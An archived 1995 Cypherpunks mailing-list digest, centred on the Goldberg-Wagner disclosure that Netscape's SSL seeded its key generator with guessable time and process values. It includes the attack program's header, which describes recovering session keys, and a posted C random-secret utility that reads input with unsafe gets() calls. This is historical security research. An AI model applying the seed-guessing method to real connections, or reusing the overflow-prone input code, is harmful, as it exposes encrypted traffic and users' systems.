<43ii1t$210@nntp.crl.com> clav at deltanet.com wrote: >ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY >SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE??? >Aliroo Ltd. has developed a Windows, eye-to-eye fax/email >encryption package called PrivaSoft. >Unlike any previously devised system, this method protects, with >only 4 mouse clicks, fax and email transmissions in electronic >and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT >IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. >You can encrypt a message, and then fax or email it (via plain >old standard fax machine or fax modem), print it to paper or save >to a disk file. >It is fully licensed, without restriction for export, by the U.S. >Department of Commerce. NO PGP WORRIES. Also no worries about security - if DOC says you can have it, you can bet that NSA has seen to it that it is cryptographically weak, or else uses a key escrow system (where sombody else can get to the keys), and as insecure as any other non-published method. For all we know, they may be using a cereal box decoder ring set up. >Email me for a free copy which will be sent to you via email or >snail mail post. It is fully functional (not crippleware) and >enables you to try our system out before purchase with 8 free >page scrambles. It retails for $130 per installed computer. >Looking for end users and distributors. >Thanks, >David From gnu at toad.com Sun Sep 17 20:24:13 1995 From: gnu at toad.com (John Gilmore) Date: Sun, 17 Sep 95 20:24:13 PDT Subject: Central Banking for the 21st Century -- Thurs 28Sep, San Fran Message-ID: <9509180324.AA29978@toad.com> The Pacific Research Forum, a local libertarian economics group, is sponsoring a talk by Dr. Jerry L. Jordan, president of the Federal Reserve Bank of Cleveland and Dr. Donald T. Brash, governor of the Reserve Bank of New Zealand, with moderator Dr. William S. Haraf, director of public policy for BofA. The forum is 3:30-5PM at the Banker's Club, 555 California St, 51st floor, SF. The reception is 5PM-6PM. It costs $25; RSVP to Cindy Sparks at +1 415 989 0833. "Central banks were originally intended to bring price stability to a paper-based bank payments system. But what will be the proper role of a central bank in the rapidly approaching era of digital money? What happens to monetary policy, supervision and regulation, as well as financial services such as clearning checks, when electronically- initiated debits and credits become the transaction of choice?" ..."Dr. Jordan predicts that ... the proliferation of digital money will provide new challenges for central banks laboring to provide stable money." I'll probably see you there... -- John Gilmore gnu at toad.com -- gnu at eff.org Don't introduce that Tsutomu to your girlfriend. From iang at CS.Berkeley.EDU Sun Sep 17 21:41:08 1995 From: iang at CS.Berkeley.EDU (Ian Goldberg) Date: Sun, 17 Sep 95 21:41:08 PDT Subject: Netscape SSL implementation cracked! Message-ID: <199509180441.VAA16683@lagos.CS.Berkeley.EDU> As some of you may recall, a few weeks ago I posted a reverse-compilation of the random number generation routine used by netscape to choose challenge data and encryption keys. Recently, one of my officemates (David Wagner ) and I (Ian Goldberg ) finished the job of seeing exactly how the encryption keys are picked. What we discovered is that, at least on the systems we checked (Solaris and HP-UX), the seed value for the RNG was fairly trivial to guess by someone with an account on the machine running netscape (so much so that in this situation, it usually takes less than 1 minute to find the key), and not too hard for people without accounts, either. See below for details. I've included the header to a program we wrote to do this key-cracking below. I would like to get some information, though: o Where should I put the full source (1 file, ~12k) so that ITAR lovers don't get mad at me? o Where can I find a version of netscape that does RC4-128? It is likely that it suffers from the same problem, and even a brute-force search of the entire seed space is _much_ less than 128 bits. Happy hacking, - Ian "who just saw _Hackers_ today with some other Bay Area cypherpunks, and it put me in the mood" /* unssl.c - Last update: 950917 Break netscape's shoddy implementation of SSL on some platforms (tested for netscape running RC4-40 on Solaris and HP-UX; other Unices are probably similar; other crypt methods are unknown, but it is likely that RC4-128 will have the same problems). The idea is this: netscape seeds the random number generator it uses to produce challenge-data and master keys with a combination of the time in seconds and microseconds, the pid and the ppid. Of these, only the microseconds is hard to determine by someone who (a) can watch your packets on the network and (b) has access to any account on the system running netscape. Even if (b) is not satisfied, the time can often be obtained from the time or daytime network daemons; an approximation to the pid can sometimes be obtained from a mail daemon (the pid is part of most Message-ID's); the ppid will usually be not much smaller than the pid, and has an higher than average chance of being 1. Clever guessing of these values will in all likelihood cut the expected search space down to less than brute-forcing a 40-bit key, and certainly is less than brute-forcing a 128-bit key. Subsequent https: connections after the first (even to different hosts) seem to _not_ reseed the RNG. This makes things much easier, once you've broken the first message. Just keep generating 16 bytes of random numbers until you get the challenge-data for the next message. The next key will then be the 16 random bytes after that. main() and bits of MD5Transform1 by Ian Goldberg and David Wagner . The rest is taken from the standard MD5 code; see below. This code seems to want to run on a big-endian machine. There may be other problems as well. This code is provided as-is; if it causes you to lose your data, sleep, civil liberties, or SO, that's your problem. #include On the command line, give the time in seconds, the pid, the ppid and the SSL challenge data (each byte in hex, separated by some non-hex character like a colon) of the _first_ SSL message generated by the instance of netscape. This program will search through the microsecond values. You may need to run it again with a slightly different value for the seconds, depending on how accurately you know the time on the system running netscape. The output will be the master key (all 16 bytes; note you never even told the program the 11 bytes you knew) and the value for the microseconds that produced it. As a benchmark, this code runs in just under 25 seconds real time (for an unsuccessful search through 1<<20 values for the microseconds) on an unloaded HP 712/80. */ From unicorn at polaris.mindport.net Sun Sep 17 22:09:52 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 17 Sep 95 22:09:52 PDT Subject: Netscape SSL implementation cracked! In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU> Message-ID: Excellent work! --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From sandfort at crl.com Sun Sep 17 22:15:27 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Sun, 17 Sep 95 22:15:27 PDT Subject: Joe Sixpack and his TV In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Sun, 17 Sep 1995, Black Unicorn wrote: > As I understand it shows like "The X-Files" don't accept unsolicited > scripts. Not surprising as I'm sure they have writer's agreements. Nobody accepts unsolicited scripts for legal reasons. The real question is, do they accept outside scripts? Some shows do; some shows don't. IF they do, they will send freelance writers a show "bible," which is a writer's guide to the basic rules concerning the structure, history, characters, etc. of the show. If you're interested, you should drop them a note asking in they accept scripts from outsiders. Giving the production offices a call would let you know what their attitude is about submissions. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From cwe at it.kth.se Sun Sep 17 22:26:37 1995 From: cwe at it.kth.se (Christian Wettergren) Date: Sun, 17 Sep 95 22:26:37 PDT Subject: Netscape SSL implementation is broken! Message-ID: <199509180525.HAA06519@piraya.electrum.kth.se> Hi! Neat, I'd say. Has everyone sold their Netscape Comm stock yet? :-) I guess we should send them the draft-ietf-security-randomness-00.txt asap. I was also thinking about how many Credit Card numbers will pass between now and the moment Netscape has done anything about it. This piece of information does have quite a value, I'd say. I have included a short program that tries to generate non-guessable random numbers. It was written a bit back, and my coding style isn't all that good. It might be interesting, or not. (Btw, if you find any problems with it, I'd appreciate to know about it.) /Christian ----- ZZ: README ----- asadi - "As strong as DES is" (hopefully) Written by: Christian Wettergren cwe at nada.kth.se February 1993 Introduction ------------ This utility generates a "random" hexstring, which can be used as input to xauth, for example. It uses a private secret and some other input to generate the hexstring. In this way a long-term secret can be used to generate a short-term secret. Since the short-term secret might be compromised (different xauth cookies might be tried repeatedly, since o warning is emitted from the Xserver) it is not safe to use the same secret on repeated occasions. This utility does not even need a private long-term secret, since it may use the ticket generated within the Kerberos authentication system. In this way the long-term secret is as guarded as your private password or the Kerberos master-password. If you don't use the Kerberos system, you have to regenerate the long-term secret sometimes (in the same way as you change your password). This utility tries to help you with that step too. A decent pseudo-random generator is included, and a routine that helps you generate the secret might be run. The short-term secret wont reveal anything about the long-term secret, since the long-term secret is altered and then encrypted with DES. The result is the short-term secret. Search space ------------ The algorithm used to generate the long-term secret tries to enlarge the search-space as much as possible. so that an exhaustive attack becomes difficult. The factors involved are: 1/ A good random generator 2/ time-of-day 3/ user entered text 4/ user dependant elapsed time 5/ pid of process 6/ hostid of computer 7/ not using consecutive values from random generator (initial throw-away & intermediate throw-away.) The most important of all is of course the random generator. The included generator is a minimum standard. Probable usage: echo add $DISPLAY MIT-MAGIC-COOKIE-1 `asadi` | xauth DISCLAIMER: No guarantees are made about this program, explicit or implicit. It is distributed AS IS. etc... :-) opensafely() - open file, try not to reveal when it was written. Unfortunately, this is not possible! No matter how this is done, at least the ctime reveals when it was written. If I don't remember incorrectly, there are bugs in the filesystem under SunOS, so that the ctime-field is updated too often. Maybe this might distort this field sometimes. Another approach might be to chmod the file whenever it is used. In this way it's ctime field is updated and hence overwritten. It does not reveal anything extra either, since the approximate time when the cookie is generated is probably shown in ~/.Xauthority anyway. /* gensecret() - generate a good secret "random" file. This routine tries to enlarge the search-space for a potential cracker. The involved factors are: 1/ A good random generator (see accompanying file.) 2/ time-of-day 3/ user entered text 4/ user dependant elapsed time 5/ pid of process 6/ hostid of computer 7/ not using consecutive values from random generator (initial throw-away & intermediate throw-away.) This approach hopefully deters an attack, or at least makes it considerably harder for the attacker. Does anyone see any weakness in the above approach? It is not based on any cryptological analysis, so no guarantees are made of it's appropriateness. */ fprintf(stderr, "asadi - generate a good random hexstring based on\n"); fprintf(stderr, " a private secret as a seed. (This secret can\n"); fprintf(stderr, " be the Kerberos ticket-file.) Could be used\n"); fprintf(stderr, " for getting a good xauth-cookie, for example.\n\n"); fprintf(stderr, "Usage: asadi [-r] [-l n] [-v] [filename]\n"); fprintf(stderr, " -r -- generate a secret file (default: ~/.secret\n"); fprintf(stderr, " -l n -- how many 8-byte blocks to output (default: 16)\n"); fprintf(stderr, " -v -- verbose, not very interesting.\n"); fprintf(stderr, " filename -- name of secret file (default: Kerberos\n"); fprintf(stderr, " ticket file, or ~/.secret)\n"); ---- ZZ: asadi.c ---- /***************************************** asadi v1.1 - "As strong as DES is" (hopefully) This utility generates a "random" hexstring, which can be used as input to xauth, for example. Either a Kerberos ticketfile or a secret file is used as seed to the random generator. Other input is probably hostid, process id and time, depending on the implementation of the DES-library. The random generator used is the DES- algorithm. This method is guaranteed not to reveal anything about the used seed. To crack the cookie you have to crack DES. (There is also a normal good pseudo-random generator included, to facilitate the generation of secrets.) Written by: Christian Wettergren cwe at nada.kth.se February 1993 Usage: asadi [keyfilename] [-v] [-l num] [-r] The number of 8-byte blocks to generate can be controlled with the -l-switch. There is also a verbose- switch. If one does not use Kerberos, a secret file can be used as a key instead. The contents of this file will not be revealed by this program, but you should of course NOT USE your password anyway! To help generate this secret file is a decent (according to it's author, not me) random- generator included in this program. Use the r-switch for this. It deposits the secret in the file ~/.secret (with the appropriate chmod). This file is also used if there is no Kerberos. Probable usage: echo add $DISPLAY MIT-MAGIC-COOKIE-1 `asadi` | xauth DISCLAIMER: No guarantees are made about this program, explicit or implicit. It is distributed AS IS. etc... :-) *****************************************/ /* Settings of this program */ #define USEKRB /* switches the use of Kerberos on/off */ #define DEFAULTKEYLEN 8 /* multiples of 16 nibbles */ #define SECRETFILE ".secret" #include #include #include #include #include #include #include #include #ifdef USEKRB #include #endif /* some unprototyped routines */ extern char *getpass(); extern void goodsrand(unsigned long); extern unsigned long goodrand(void); extern char *getenv(char *); extern void *malloc(int); /* Globals */ char *keyfile = NULL; int vflag = 0; int keylen = DEFAULTKEYLEN; int major = 1; /* version of program */ int minor = 0; /* calculate a secret key from the file. */ /* Algorithm: read 8 bytes, add them byte-wise to the cblock, continue until eof. Hence there is no actual reason to use files larger than eight bytes, but the above approach is used since the ticket-files are larger. (In this way I don't have to care about file's structure too much, either.) */ void calcsecretkey(char *file, des_cblock *key) { des_cblock tmp; int i; int fd; if (vflag) fprintf(stderr, "file: %s\n", keyfile); if ((fd = open(file, O_RDONLY)) == -1) { fprintf(stderr, "Could not open '%s', no cookie generated! (errno=%d)\n", file, errno); exit(1); } while (read(fd, &tmp, sizeof(des_cblock)) == sizeof(des_cblock)) { for(i = 0; i < sizeof(des_cblock); i++) *((unsigned char *)key + i) = *((unsigned char *)key + i) + *((unsigned char *)tmp + i); DES_ZERO_CBLOCK(tmp); /* fixes eof-condition */ } /* close the file */ if (close(fd) == -1) { fprintf(stderr, "Could not close file! (errno=%d)\n", errno); exit(1); } } void printcblock(FILE *fd, des_cblock *blk) { int i; for(i=0; i < sizeof(des_cblock); i++) { fprintf(fd, "%02x", (unsigned int)(*((unsigned char *)blk + i) & 255)); } } /* opensafely() - open file, try not to reveal when it was written. Unfortunately, this is not possible! No matter how this is done, at least the ctime reveals when it was written. If I don't remember incorrectly, there are bugs in the filesystem under SunOS, so that the ctime-field is updated too often. Maybe this might distort this field sometimes. Another approach might be to chmod the file whenever it is used. In this way it's ctime field is updated and hence overwritten. It does not reveal anything extra either, since the approximate time when the cookie is generated is probably shown in ~/.Xauthority anyway. */ int opensafely(char *file) { int fd; /* delete old file, if any */ if (unlink(file) == -1) { if (errno != ENOENT) { fprintf(stderr, "Error: could not unlink '%s'. (errno=%d)\n", file, errno); exit(1); } } /* open it again */ if ((fd = open(file, O_WRONLY|O_CREAT, S_IRUSR)) == -1) { fprintf(stderr, "Error: could not create '%s'. (errno=%d)\n", file, errno); exit(1); } return(fd); } /* gensecret() - generate a good secret "random" file. This routine tries to enlarge the search-space for a potential cracker. The involved factors are: 1/ A good random generator (see accompanying file.) 2/ time-of-day 3/ user entered text 4/ user dependant elapsed time 5/ pid of process 6/ hostid of computer 7/ not using consecutive values from random generator (initial throw-away & intermediate throw-away.) This approach hopefully deters an attack, or at least makes it considerably harder for the attacker. Does anyone see any weakness in the above approach? It is not based on any cryptological analysis, so no guarantees are made of it's appropriateness. */ void gensecret(char *file) { int i,j; struct timeval t, s; unsigned long d, u, v; int fd; unsigned long x; char *c; char n[100]; int ta, b; struct utimbuf tm; /* Get time before enter */ gettimeofday(&s, (struct timezone *)0); /* heading */ printf("\nGenerating a Secret!\n"); /* get user's response */ printf("\nCAUTION! Don't use your password below!\n"); printf("You don't have to remember this data, so\n"); printf("just type something in.\n\n"); c = getpass("Enter something:"); /* get time after enter */ gettimeofday(&t, (struct timezone *)0); d = t.tv_usec - s.tv_usec; /* make something of input */ for(j=0; j < strlen(c) / sizeof(unsigned long); j++) { /* collect sizeof(long) bytes of input */ for(v=0, i=0; i < sizeof(unsigned long); i++) v = (v << 8) + c[i+j*sizeof(unsigned long)]; /* xor them together */ u ^= v; } /* get throw-away factors */ printf("\nEnter a throw-away factor: "); gets(n); ta = atoi(n); printf("\nEnter a step factor: "); gets(n); b = atoi(n); /* verbose */ if (vflag) { fprintf(stderr, "text: %s\n", c); fprintf(stderr, "garbled text: %ld\n", u); fprintf(stderr, "elapsed: %ld\n", d); fprintf(stderr, "time: %ld %ld\n", t.tv_sec, t.tv_usec); fprintf(stderr, "pid: %d\n", getpid()); fprintf(stderr, "hostid: %d\n", gethostid()); fprintf(stderr, "throw-away factor: %d\n", ta); fprintf(stderr, "step factor: %d\n", b); fprintf(stderr, "generated seed: %ld\n", t.tv_usec ^ t.tv_sec ^ d ^ getpid() ^ gethostid() ^ u); } /* init random generator */ goodsrand(t.tv_usec ^ t.tv_sec ^ d ^ getpid() ^ gethostid() ^ u); /* open the file safely */ fd = opensafely(keyfile); /* throw-away ta numbers */ for(i=0; i < ta; i++) (void)goodrand(); /* this actually writes sizeof(long) times too much data, but it does not matter. */ for (i=0; i #define m (unsigned long)2147483647 #define q (unsigned long)127773 #define a (unsigned int)16807 #define r (unsigned int)2836 /* ** F(z) = (az)%m ** = az-m(az/m) ** ** F(z) = G(z)+mT(z) ** G(z) = a(z%q)- r(z/q) ** T(z) = (z/q) - (az/m) ** ** F(z) = a(z%q)- rz/q+ m((z/q) - a(z/m)) ** = a(z%q)- rz/q+ m(z/q) - az */ /* ** */ unsigned long seed; void goodsrand( /* unsigned long*/ initial_seed) unsigned long initial_seed; { seed = initial_seed; } /* ** */ unsigned long goodrand(/*void*/){ register int lo, hi, test; hi = seed/q; lo = seed%q; test = a*lo - r*hi; if (test > 0) seed = test; else seed = test+ m; return seed; } #ifdef TEST1 /* ** The result of running this program should be ** 1043618065. If this program does not yeild this ** value then your compiler has not implemented this ** program correctly. */ main(/*void*/) { unsigned long n_rand; register int i; int success = 0; goodsrand(1); for( i = 1; i <= 10001; i++){ n_rand = goodrand(); if( i> 9998) printf("Sequence %5i, Seed= %10i\n", i, seed ); if( i == 10000) if( seed == 1043618065 ) success = 1; } if (success){ printf("The random number generator works correctly.\n\n"); exit(0); }else{ printf("The random number generator DOES NOT WORK!\n\n"); exit(1); } } #endif /* -- +- Bill England, wengland at stephsf.COM -----------------------------------+ | * * H -> He +24Mev | | * * * ... Oooo, we're having so much fun making itty bitty suns * | |__ * * ___________________________________________________________________| */ ---- ZZ: Makefile ---- # # Makefile for asadi. # CC=gcc CFLAGS=-g LIBS=-lkrb -ldes asadi: asadi.c rand.o ${CC} ${CFLAGS} -o asadi asadi.c rand.o ${LIBS} rand.o: rand.c $(CC) -c rand.c From perry at piermont.com Sun Sep 17 22:27:10 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 17 Sep 95 22:27:10 PDT Subject: Netscape SSL implementation cracked! In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU> Message-ID: <199509180527.BAA28782@frankenstein.piermont.com> Ian Goldberg writes: > What we discovered is that, at least on the systems we checked (Solaris > and HP-UX), the seed value for the RNG was fairly trivial to guess by > someone with an account on the machine running netscape (so much so > that in this situation, it usually takes less than 1 minute to find > the key), and not too hard for people without accounts, either. > See below for details. Why is this completely unsuprising? I've said it before and I'll say it again -- Netscape's programmers (with a few notable exceptions -- you know who you are) tend to be sloppy about security critical details. Experience with most of the same people from back when they built Mosaic shows that they just don't get the details right. (I wonder how many buffer overflow security bugs lurk in Netscape waiting to be found. I wonder how many such bugs lurk in their web servers, too...) Anyway, congratulations to you and Dave on an excellent piece of work. I say a bunch of us should buy you "I broke Netscape's security and all I got was this lousy T-Shirt" shirts, if only someone would design them! (Two of those should be given to our friends in the U.K. and at INRIA who brute forced Netscape before. A dozen more of the shirts should be held for future breaks -- which are a "when", not an "if".) > I've included the header to a program we wrote to do this key-cracking > below. I would like to get some information, though: > > o Where should I put the full source (1 file, ~12k) so that ITAR lovers > don't get mad at me? Give it to the folks at ftp.csua.berkeley.edu, I say. > o Where can I find a version of netscape that does RC4-128? It is > likely that it suffers from the same problem, and even a brute-force > search of the entire seed space is _much_ less than 128 bits. They sell it in stores. Perry From klp at gold.tc.umn.edu Sun Sep 17 22:27:32 1995 From: klp at gold.tc.umn.edu (Kevin L Prigge) Date: Sun, 17 Sep 95 22:27:32 PDT Subject: Netscape SSL implementation cracked! In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU> Message-ID: <305d030d0527002@noc.cis.umn.edu> A little birdie told me that Ian Goldberg said: > > As some of you may recall, a few weeks ago I posted a > reverse-compilation of the random number generation routine used by > netscape to choose challenge data and encryption keys. > > Recently, one of my officemates (David Wagner ) > and I (Ian Goldberg ) finished the job > of seeing exactly how the encryption keys are picked. > > What we discovered is that, at least on the systems we checked (Solaris > and HP-UX), the seed value for the RNG was fairly trivial to guess by > someone with an account on the machine running netscape (so much so > that in this situation, it usually takes less than 1 minute to find > the key), and not too hard for people without accounts, either. Makes one wonder what the seed is on a Windows implementation... If it's only the time, you can probably approximate what the clock is set to within a couple of minutes (if the timezone of the client is known). -- Kevin Prigge | Holes in whats left of my reason, CIS Consultant | holes in the knees of my blues, Computer & Information Services | odds against me been increasin' email: klp at cis.umn.edu | but I'll pull through... From perry at piermont.com Sun Sep 17 22:30:10 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 17 Sep 95 22:30:10 PDT Subject: Netscape SSL implementation is broken! In-Reply-To: <199509180525.HAA06519@piraya.electrum.kth.se> Message-ID: <199509180529.BAA28806@frankenstein.piermont.com> Christian Wettergren writes: > I guess we should send them the draft-ietf-security-randomness-00.txt > asap. I thought that was an RFC by now. Perry From jcaldwel at iquest.net Sun Sep 17 22:42:15 1995 From: jcaldwel at iquest.net (James Caldwell) Date: Sun, 17 Sep 95 22:42:15 PDT Subject: Netscape SSL implementation cracked! In-Reply-To: <305d030d0527002@noc.cis.umn.edu> Message-ID: Kevin L Prigge wrote: A little birdie told me that Ian Goldberg said: > What we discovered is that, at least on the systems we checked (Solaris > and HP-UX), the seed value for the RNG was fairly trivial to guess by > someone with an account on the machine running netscape (so much so > that in this situation, it usually takes less than 1 minute to find > the key), and not too hard for people without accounts, either. / Makes one wonder what the seed is on a Windows implementation... / If it's only the time, you can probably approximate what the / clock is set to within a couple of minutes (if the timezone of the / client is known). Hah! Like a Cmos clock can *ever* keep a consistant time for more than two minutes... From jis at mit.edu Sun Sep 17 23:34:08 1995 From: jis at mit.edu (Jeffrey I. Schiller) Date: Sun, 17 Sep 95 23:34:08 PDT Subject: Netscape SSL implementation cracked! Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Makes one wonder what the seed is on a Windows implementation... >If it's only the time, you can probably approximate what the >clock is set to within a couple of minutes (if the timezone of the >client is known). Who cares what the timezone of the client is. Try searching around in all 24 timezones. The trick with predicting a random number generator isn't that you have to get the exact key, you just have to narrow the search space to something reasonable. A couple of minutes times 24 isn't that bad! -Jeff -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMF0SvMUtR20Nv5BtAQEAVQP/ccPp8IM8dnGtdDTajjO1a0sYBo7u7LcB yracUhWnE6h90DEtEbGHpEUz3UpvMrXVTC1cFYXml8v3zH4DKlgXyIwC1kItAbqB 9NJTtvB1D5Msnoslqkn+ZoP2K8i0ajcHcXlqma32YiQJM6D4KSxFtRgM7vawCVuy KqnbrdSrQQQ= =bYf5 -----END PGP SIGNATURE----- From danjw at earthlink.net Mon Sep 18 00:27:34 1995 From: danjw at earthlink.net (Dan Weinstein) Date: Mon, 18 Sep 95 00:27:34 PDT Subject: Netscape Navigator 2.0 will implement secure e-mail Message-ID: <199509180727.AAA23196@atlas.earthlink.net> I just got off of Netscapes home page and they have announced Netscape Navigator 2.0. It will include full e-mail funtionality with S/MIME implemented. Does anybody know anything about the S/MIME Protocol? How secure is it? Dan Weinstein danjw at earthlink.net http://www.earthlink.net/~danjw PGP public key is available from my Home Page. "I understand by 'freedom of Spirit' something quite difinite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From jsw at neon.netscape.com Mon Sep 18 01:35:16 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Mon, 18 Sep 95 01:35:16 PDT Subject: Netscape Navigator 2.0 will implement secure e-mail In-Reply-To: <199509180727.AAA23196@atlas.earthlink.net> Message-ID: <43jau5$qbj@tera.mcom.com> In article <199509180727.AAA23196 at atlas.earthlink.net>, danjw at earthlink.net (Dan Weinstein) writes: > I just got off of Netscapes home page and they have announced Netscape > Navigator 2.0. It will include full e-mail funtionality with S/MIME > implemented. Does anybody know anything about the S/MIME Protocol? > How secure is it? You can find some documents about s/mime on RSA's web site: http://www.rsa.com/ftpdir/pub/S-MIME/ S/MIME is basicly a mime body enveloped in a PKCS7 message. You can find out more about PKCS from: http://www.rsa.com/ftpdir/pub/pkcs The implementation guide recommends using rc2-cbc 40-bit for content encryption when there is no way to determine the capabilities of the recipient. When you do know what the recipient can do, it recommends using RC2-CBC with a longer key or DES-CBC. For key encryption support for RSA with key sizes of 512 to 1024 is required, and support for 2048 bit keys is recommended. A minimum key size of 768 bits is recommended for US users. > Dan Weinstein Hi Dan. Yes, we are related. :-) -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From eay at mincom.oz.au Mon Sep 18 02:11:20 1995 From: eay at mincom.oz.au (Eric Young) Date: Mon, 18 Sep 95 02:11:20 PDT Subject: Netscape Navigator 2.0 will implement secure e-mail In-Reply-To: <43jau5$qbj@tera.mcom.com> Message-ID: On 18 Sep 1995, Jeff Weinstein wrote: > The implementation guide recommends using rc2-cbc 40-bit for content > encryption when there is no way to determine the capabilities of the > recipient. When you do know what the recipient can do, it recommends > using RC2-CBC with a longer key or DES-CBC. Hmm.... notice the use of a non public cipher as the base cipher.... what a shame.... A note for non-USA people, the next version of SSLeay will include the full fuctionality of RSAref/RSAeuro and I should soon have the PKCS-7 stuff finished in the next release after that. I've almost finished the documentation of the encryption/RSA type routines. The encryption/open/seal routines supporting any cipher that conforms with a specified Cipher API. It will be shipping with examples of des-ecb, des-cfb, des-cbc, des-ede2, des-ede3, idea-ecb, idea-cfb, idea-cbc and rc4-128. If people could send me the official Object identifiers for these ciphers, I'll be able to support them in PKCS-7, otherwise they will only be supported in PEM mode. eg, rc4 is '1 2 840 113549 3 4' but I don't even know what des in cbc mode is. I lack documentation. If any-one can email SMIME/PKCS-7 stuff that is encrypted/sealed, I'll be able to extract the object identifiers. > For key encryption support for RSA with key sizes of 512 to 1024 is > required, and support for 2048 bit keys is recommended. A minimum > key size of 768 bits is recommended for US users. Again, SSLeay has no restrictions, 4096 bits anyone :-) eric (who is just lacking documentation :-( -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From carolann at censored.org Mon Sep 18 02:29:53 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Mon, 18 Sep 95 02:29:53 PDT Subject: Jill Sixpack wants to know? Message-ID: <199509180929.CAA12683@usr1.primenet.com> Is the cracking of Netscape SSL the equivalant of lockpicking, as opposed to the keycracking stuff we did (making a key). And further, we can do it rather fast, like in minutes? I just want to make sure I explain it to Jill Sixpack correctly. OK! KEWLNESS! Love Always, Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From jsw at neon.netscape.com Mon Sep 18 03:41:42 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Mon, 18 Sep 95 03:41:42 PDT Subject: Netscape Navigator 2.0 will implement secure e-mail In-Reply-To: <43jau5$qbj@tera.mcom.com> Message-ID: <43jibb$5ok@tera.mcom.com> In article , eay at mincom.oz.au (Eric Young) writes: > Hmm.... notice the use of a non public cipher as the base cipher.... > what a shame.... The only reason for this is US export laws. > It will be shipping with examples of des-ecb, des-cfb, des-cbc, des-ede2, > des-ede3, idea-ecb, idea-cfb, idea-cbc and rc4-128. If people could send > me the official Object identifiers for these ciphers, I'll be able to > support them in PKCS-7, otherwise they will only be supported in PEM mode. Here are the ones I have: DES-ECB OBJECT IDENTIFIER ::= { algorithm 6 } DES-CBC OBJECT IDENTIFIER ::= { algorithm 7 } DES-OFB OBJECT IDENTIFIER ::= { algorithm 8 } DES-CFB OBJECT IDENTIFIER ::= { algorithm 9 } DES-MAC OBJECT IDENTIFIER ::= { algorithm 10 } DES-EDE OBJECT IDENTIFIER ::= { algorithm 17 } where algorithm OBJECT IDENTIFIER ::= {iso(1) identified-organization(3) oiw(14) secsig(3) algorithm(2)} --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From rah at shipwright.com Mon Sep 18 04:31:19 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 18 Sep 95 04:31:19 PDT Subject: e$: New Ecash Shop Message-ID: Now, this looks interesting... Cheers, Bob Hettinga --- begin forwarded text From: kulz at dragon.klte.hu (Kultsar Zoltan) Subject: New Ecash Shop To: rah at shipwright.com Date: Mon, 18 Sep 1995 12:30:19 +0200 (MET DST) MIME-Version: 1.0 I have opened a new unofficial shop, that accepts ecash. It's unofficial, because it has not yet a logo. It is an autoresponder, which automatically sends out documents that people reques. Uploading costs 5 USD or 15 cb$s (minimum charges). Your documents will also be available on www, or you can build your homepage if you wish, but I can provide only slow links yet. I bought the original autoresponder for ecash, but it in its original form wasn't secure. Eg. 'send *' type requests sent out private material. Now it's completely secure. Send mail To: kulz at dragon.klte.hu Subject: send faxbank There is also a www page at http://dragon.klte.hu/~kulz/faxbank.html, where you can view the documents online. --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From danisch at ira.uka.de Mon Sep 18 06:01:10 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Mon, 18 Sep 95 06:01:10 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? Message-ID: <9509181245.AA02101@elysion.iaks.ira.uka.de> > Bad idea, it would simply mean that every kook on USEnet would add > alt.cypherpunks onto the crossposting line. We would have black helicopters, gun > loons, Waco Wako's, Loonytarians and turkish government propaganda spamming > forever. And cancel-messages from Co$ ... Hadmut From raph at CS.Berkeley.EDU Mon Sep 18 06:50:41 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 18 Sep 95 06:50:41 PDT Subject: List of reliable remailers Message-ID: <199509181350.GAA01202@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: 